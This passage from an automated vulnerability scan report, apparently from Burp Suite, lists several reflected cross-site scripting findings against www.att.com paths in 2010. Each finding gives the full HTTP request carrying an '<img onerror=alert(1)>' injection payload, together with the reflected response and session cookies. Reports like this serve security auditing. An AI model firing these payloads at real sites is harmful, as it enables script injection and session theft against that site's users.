<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/cssa83c8"><img src=a onerror=alert(1)>f9b89fd5173/primaryNav.css">
...[SNIP]...

1.14. https://www.att.com/olam/css/primaryNav.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/primaryNav.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9b20"><img%20src%3da%20onerror%3dalert(1)>39b0be80356 was submitted in the REST URL parameter 3. This input was echoed as a9b20"><img src=a onerror=alert(1)>39b0be80356 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/css/primaryNav.cssa9b20"><img%20src%3da%20onerror%3dalert(1)>39b0be80356 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9089
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:45 GMT
Connection: keep-alive
Set-Cookie: TLTHID=59E7C4E40B8C100B72C6DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/css/primaryNav.cssa9b20"><img src=a onerror=alert(1)>39b0be80356">
...[SNIP]...

1.15. https://www.att.com/olam/css/print.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f47db"><img%20src%3da%20onerror%3dalert(1)>2a3a6f6e920 was submitted in the REST URL parameter 2. This input was echoed as f47db"><img src=a onerror=alert(1)>2a3a6f6e920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/cssf47db"><img%20src%3da%20onerror%3dalert(1)>2a3a6f6e920/print.css HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9084
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:37 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/cssf47db"><img src=a onerror=alert(1)>2a3a6f6e920/print.css">
...[SNIP]...

1.16. https://www.att.com/olam/css/print.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7cf"><img%20src%3da%20onerror%3dalert(1)>0f222242c82 was submitted in the REST URL parameter 3. This input was echoed as 3b7cf"><img src=a onerror=alert(1)>0f222242c82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/css/print.css3b7cf"><img%20src%3da%20onerror%3dalert(1)>0f222242c82 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9084
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:44 GMT
Connection: keep-alive
Set-Cookie: TLTHID=59A8D91E0B8C100B72BDDD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/css/print.css3b7cf"><img src=a onerror=alert(1)>0f222242c82">
...[SNIP]...

1.17. https://www.att.com/olam/js/AC_RunActiveContent.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34235"><img%20src%3da%20onerror%3dalert(1)>99450cd7692 was submitted in the REST URL parameter 2. This input was echoed as 34235"><img src=a onerror=alert(1)>99450cd7692 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js34235"><img%20src%3da%20onerror%3dalert(1)>99450cd7692/AC_RunActiveContent.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9096
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:22 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js34235"><img src=a onerror=alert(1)>99450cd7692/AC_RunActiveContent.js">
...[SNIP]...

1.18. https://www.att.com/olam/js/AC_RunActiveContent.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2c45"><img%20src%3da%20onerror%3dalert(1)>43f52593c2 was submitted in the REST URL parameter 3. This input was echoed as d2c45"><img src=a onerror=alert(1)>43f52593c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/AC_RunActiveContent.jsd2c45"><img%20src%3da%20onerror%3dalert(1)>43f52593c2 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9095
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:30 GMT
Connection: keep-alive
Set-Cookie: TLTHID=9850DFF40B8C100B769BDD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/AC_RunActiveContent.jsd2c45"><img src=a onerror=alert(1)>43f52593c2">
...[SNIP]...

1.19. https://www.att.com/olam/js/ATT-Olam-english-mtagconfig.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/ATT-Olam-english-mtagconfig.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dcfc"><img%20src%3da%20onerror%3dalert(1)>ea2e770d6b9 was submitted in the REST URL parameter 2. This input was echoed as 3dcfc"><img src=a onerror=alert(1)>ea2e770d6b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js3dcfc"><img%20src%3da%20onerror%3dalert(1)>ea2e770d6b9/ATT-Olam-english-mtagconfig.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9104
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:22 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js3dcfc"><img src=a onerror=alert(1)>ea2e770d6b9/ATT-Olam-english-mtagconfig.js">
...[SNIP]...

1.20. https://www.att.com/olam/js/ATT-Olam-english-mtagconfig.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/ATT-Olam-english-mtagconfig.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa54a"><img%20src%3da%20onerror%3dalert(1)>5c75d840cee was submitted in the REST URL parameter 3. This input was echoed as fa54a"><img src=a onerror=alert(1)>5c75d840cee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/ATT-Olam-english-mtagconfig.jsfa54a"><img%20src%3da%20onerror%3dalert(1)>5c75d840cee HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; 